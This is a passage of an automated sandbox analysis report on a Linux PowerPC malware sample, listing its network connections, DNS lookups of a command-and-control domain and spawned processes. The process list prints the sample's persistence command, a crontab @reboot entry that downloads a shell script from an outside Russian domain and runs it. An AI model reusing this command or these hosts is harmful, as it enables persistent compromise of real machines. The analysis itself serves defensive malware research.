                                                        LOAD0x129600x100229600x100229600x39c0x54a83.04720x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 24, 2024 14:03:47.910070896 CEST43928443192.168.2.2391.189.91.42
                                                        Oct 24, 2024 14:03:49.501631021 CEST537229896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:49.507671118 CEST98965372281.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:03:49.507730961 CEST537229896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:49.510816097 CEST537229896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:49.516876936 CEST98965372281.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:03:49.516921997 CEST537229896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:49.522335052 CEST98965372281.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:03:49.668962955 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:49.674403906 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:03:49.674460888 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:49.675108910 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:49.680556059 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:03:49.680603981 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:49.685926914 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:03:50.452836037 CEST98965372281.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:03:50.452917099 CEST537229896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:50.453094006 CEST537229896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:53.541167974 CEST42836443192.168.2.2391.189.91.43
                                                        Oct 24, 2024 14:03:54.565043926 CEST4251680192.168.2.23109.202.202.202
                                                        Oct 24, 2024 14:03:59.683419943 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:03:59.688931942 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:03:59.988050938 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:03:59.988120079 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:04:00.496501923 CEST4070817173192.168.2.23194.87.198.29
                                                        Oct 24, 2024 14:04:00.502113104 CEST1717340708194.87.198.29192.168.2.23
                                                        Oct 24, 2024 14:04:00.502166986 CEST4070817173192.168.2.23194.87.198.29
                                                        Oct 24, 2024 14:04:00.502223969 CEST4070817173192.168.2.23194.87.198.29
                                                        Oct 24, 2024 14:04:00.507601976 CEST1717340708194.87.198.29192.168.2.23
                                                        Oct 24, 2024 14:04:00.507654905 CEST4070817173192.168.2.23194.87.198.29
                                                        Oct 24, 2024 14:04:00.513115883 CEST1717340708194.87.198.29192.168.2.23
                                                        Oct 24, 2024 14:04:01.775769949 CEST1717340708194.87.198.29192.168.2.23
                                                        Oct 24, 2024 14:04:01.775883913 CEST4070817173192.168.2.23194.87.198.29
                                                        Oct 24, 2024 14:04:01.775883913 CEST4070817173192.168.2.23194.87.198.29
                                                        Oct 24, 2024 14:04:06.794313908 CEST3789615905192.168.2.2391.149.218.232
                                                        Oct 24, 2024 14:04:06.799772024 CEST159053789691.149.218.232192.168.2.23
                                                        Oct 24, 2024 14:04:06.799860001 CEST3789615905192.168.2.2391.149.218.232
                                                        Oct 24, 2024 14:04:06.799860001 CEST3789615905192.168.2.2391.149.218.232
                                                        Oct 24, 2024 14:04:06.805407047 CEST159053789691.149.218.232192.168.2.23
                                                        Oct 24, 2024 14:04:06.805596113 CEST3789615905192.168.2.2391.149.218.232
                                                        Oct 24, 2024 14:04:06.811085939 CEST159053789691.149.218.232192.168.2.23
                                                        Oct 24, 2024 14:04:08.899030924 CEST43928443192.168.2.2391.189.91.42
                                                        Oct 24, 2024 14:04:15.272562027 CEST33606443192.168.2.2354.171.230.55
                                                        Oct 24, 2024 14:04:15.278775930 CEST4433360654.171.230.55192.168.2.23
                                                        Oct 24, 2024 14:04:15.278855085 CEST33606443192.168.2.2354.171.230.55
                                                        Oct 24, 2024 14:04:16.806061983 CEST3789615905192.168.2.2391.149.218.232
                                                        Oct 24, 2024 14:04:16.811654091 CEST159053789691.149.218.232192.168.2.23
                                                        Oct 24, 2024 14:04:17.037256956 CEST159053789691.149.218.232192.168.2.23
                                                        Oct 24, 2024 14:04:17.037416935 CEST3789615905192.168.2.2391.149.218.232
                                                        Oct 24, 2024 14:04:19.137640953 CEST42836443192.168.2.2391.189.91.43
                                                        Oct 24, 2024 14:04:25.280963898 CEST4251680192.168.2.23109.202.202.202
                                                        Oct 24, 2024 14:04:49.853404045 CEST43928443192.168.2.2391.189.91.42
                                                        Oct 24, 2024 14:05:10.330544949 CEST42836443192.168.2.2391.189.91.43
                                                        Oct 24, 2024 14:05:20.037336111 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:05:20.042972088 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:05:21.197155952 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:05:21.197211027 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:05:21.197364092 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:05:21.197364092 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:05:21.197364092 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:05:21.197462082 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:05:21.484404087 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:05:21.484602928 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:05:37.097917080 CEST3789615905192.168.2.2391.149.218.232
                                                        Oct 24, 2024 14:05:37.103368044 CEST159053789691.149.218.232192.168.2.23
                                                        Oct 24, 2024 14:05:37.330084085 CEST159053789691.149.218.232192.168.2.23
                                                        Oct 24, 2024 14:05:37.330374956 CEST3789615905192.168.2.2391.149.218.232
                                                        Oct 24, 2024 14:06:41.254251957 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:06:41.259725094 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:06:41.561290979 CEST98965372481.29.149.178192.168.2.23
                                                        Oct 24, 2024 14:06:41.561491966 CEST537249896192.168.2.2381.29.149.178
                                                        Oct 24, 2024 14:06:57.382013083 CEST3789615905192.168.2.2391.149.218.232
                                                        Oct 24, 2024 14:06:57.387600899 CEST159053789691.149.218.232192.168.2.23
                                                        Oct 24, 2024 14:06:57.612938881 CEST159053789691.149.218.232192.168.2.23
                                                        Oct 24, 2024 14:06:57.613199949 CEST3789615905192.168.2.2391.149.218.232
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 24, 2024 14:03:49.470171928 CEST5193653192.168.2.2381.169.136.222
                                                        Oct 24, 2024 14:03:49.499398947 CEST535193681.169.136.222192.168.2.23
                                                        Oct 24, 2024 14:03:49.626316071 CEST4095053192.168.2.2381.169.136.222
                                                        Oct 24, 2024 14:03:49.656424046 CEST534095081.169.136.222192.168.2.23
                                                        Oct 24, 2024 14:03:55.459270000 CEST5327853192.168.2.235.161.109.23
                                                        Oct 24, 2024 14:04:00.462084055 CEST5972853192.168.2.23185.181.61.24
                                                        Oct 24, 2024 14:04:00.495985985 CEST5359728185.181.61.24192.168.2.23
                                                        Oct 24, 2024 14:04:06.780787945 CEST5521953192.168.2.23194.36.144.87
                                                        Oct 24, 2024 14:04:06.792768002 CEST5355219194.36.144.87192.168.2.23
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 24, 2024 14:03:49.470171928 CEST192.168.2.2381.169.136.2220x8044Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.626316071 CEST192.168.2.2381.169.136.2220x8044Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:55.459270000 CEST192.168.2.235.161.109.230x9297Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.462084055 CEST192.168.2.23185.181.61.240xe716Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.780787945 CEST192.168.2.23194.36.144.870xa35aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.499398947 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:03:49.656424046 CEST81.169.136.222192.168.2.230x8044No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:00.495985985 CEST185.181.61.24192.168.2.230xe716No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                        Oct 24, 2024 14:04:06.792768002 CEST194.36.144.87192.168.2.230xa35aNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false

                                                        System Behavior

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/tmp/ppc.elf
                                                        Arguments:/tmp/ppc.elf
                                                        File size:5388968 bytes
                                                        MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/tmp/ppc.elf
                                                        Arguments:-
                                                        File size:5388968 bytes
                                                        MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/bin/sh
                                                        Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/usr/bin/crontab
                                                        Arguments:crontab -l
                                                        File size:43720 bytes
                                                        MD5 hash:66e521d421ac9b407699061bf21806f5

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/usr/bin/crontab
                                                        Arguments:crontab -
                                                        File size:43720 bytes
                                                        MD5 hash:66e521d421ac9b407699061bf21806f5

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/tmp/ppc.elf
                                                        Arguments:-
                                                        File size:5388968 bytes
                                                        MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/tmp/ppc.elf
                                                        Arguments:-
                                                        File size:5388968 bytes
                                                        MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/tmp/ppc.elf
                                                        Arguments:-
                                                        File size:5388968 bytes
                                                        MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/tmp/ppc.elf
                                                        Arguments:-
                                                        File size:5388968 bytes
                                                        MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                        Start time (UTC):12:03:48
                                                        Start date (UTC):24/10/2024
                                                        Path:/tmp/ppc.elf
                                                        Arguments:-
                                                        File size:5388968 bytes
                                                        MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                        Start time (UTC):12:04:14
                                                        Start date (UTC):24/10/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):12:04:14
                                                        Start date (UTC):24/10/2024
                                                        Path:/usr/bin/rm
                                                        Arguments:rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7
                                                        File size:72056 bytes
                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                        Start time (UTC):12:04:14
                                                        Start date (UTC):24/10/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):12:04:14
                                                        Start date (UTC):24/10/2024
                                                        Path:/usr/bin/rm
                                                        Arguments:rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7
                                                        File size:72056 bytes
                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b